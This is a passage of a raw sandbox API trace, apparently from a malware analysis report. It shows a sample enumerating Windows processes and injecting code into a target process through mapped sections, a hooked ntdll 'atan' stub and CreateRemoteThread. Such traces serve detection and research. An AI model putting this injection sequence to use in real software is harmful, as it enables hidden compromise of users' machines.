lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0177.723] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0177.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0177.724] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0177.724] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0177.725] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.725] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.725] CloseHandle (hObject=0xec) returned 1 [0177.725] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0177.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0177.726] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.726] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.726] CloseHandle (hObject=0xec) returned 1 [0177.726] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0177.726] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0177.727] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.727] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.727] CloseHandle (hObject=0xec) returned 1 [0177.727] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0177.727] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0177.727] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.727] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.727] CloseHandle (hObject=0xec) returned 1 [0177.727] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.728] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0177.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0177.728] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.728] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.728] CloseHandle (hObject=0xec) returned 1 [0177.728] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0177.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0177.729] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.729] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0177.729] CloseHandle (hObject=0xec) returned 1 [0177.729] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0177.729] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0177.729] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0177.729] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.729] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0177.729] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.729] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0177.729] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.729] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0177.729] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x250000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0177.730] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0177.730] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x270000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0177.730] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0177.731] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0177.731] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0177.731] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0177.731] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0177.731] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0177.731] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0177.731] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0177.731] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0177.731] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0177.731] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0177.732] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0177.732] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0177.732] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0177.732] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0177.732] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0177.732] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0177.732] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0177.732] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0177.732] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0177.732] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0177.732] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0177.733] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0250000) returned 0x881f0 [0177.733] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0177.734] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0177.734] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0177.734] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0177.734] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0177.735] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0177.735] GetLastError () returned 0x0 [0177.735] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0177.735] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0177.735] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0177.735] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0177.736] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0177.763] CloseHandle (hObject=0xfc) returned 1 [0177.763] Sleep (dwMilliseconds=0x1f4) [0178.270] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0178.271] CloseHandle (hObject=0xf8) returned 1 [0178.271] CloseHandle (hObject=0xf4) returned 1 [0178.271] CloseHandle (hObject=0xf0) returned 1 [0178.271] CloseHandle (hObject=0xec) returned 1 [0178.271] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x771abee0, th32ProcessID=0x76c4d9e0, th32DefaultHeapID=0x76c31410, th32ModuleID=0x66006f, cntThreads=0x747f19d8, th32ParentProcessID=0x747f1a80, pcPriClassBase=1997923180, dwFlags=0x770cbacf, szExeFile="?,?8\x01")) returned 0 [0178.272] CloseHandle (hObject=0xe8) returned 1 [0178.272] Sleep (dwMilliseconds=0x3e8) [0179.284] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0179.286] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0179.286] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0179.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0179.287] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0179.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0179.287] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0179.288] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0179.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0179.288] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0179.289] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0179.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0179.289] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0179.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0179.290] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0179.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0179.290] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0179.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0179.291] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0179.291] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0179.292] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0179.292] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0179.293] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0179.293] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0179.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0179.294] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0179.294] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0179.295] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0179.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0179.295] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.295] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.295] CloseHandle (hObject=0xec) returned 1 [0179.295] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0179.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0179.296] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0179.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0179.296] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.296] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.297] CloseHandle (hObject=0xec) returned 1 [0179.297] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0179.297] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0179.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0179.298] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0179.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0179.298] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.298] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.298] CloseHandle (hObject=0xec) returned 1 [0179.298] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0179.298] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0179.298] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0179.298] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0179.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0179.299] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.299] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.299] CloseHandle (hObject=0xec) returned 1 [0179.299] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0179.299] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0179.299] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0179.299] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0179.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0179.299] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.299] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0179.299] CloseHandle (hObject=0xec) returned 1 [0179.300] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0179.300] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0179.300] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0179.300] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, 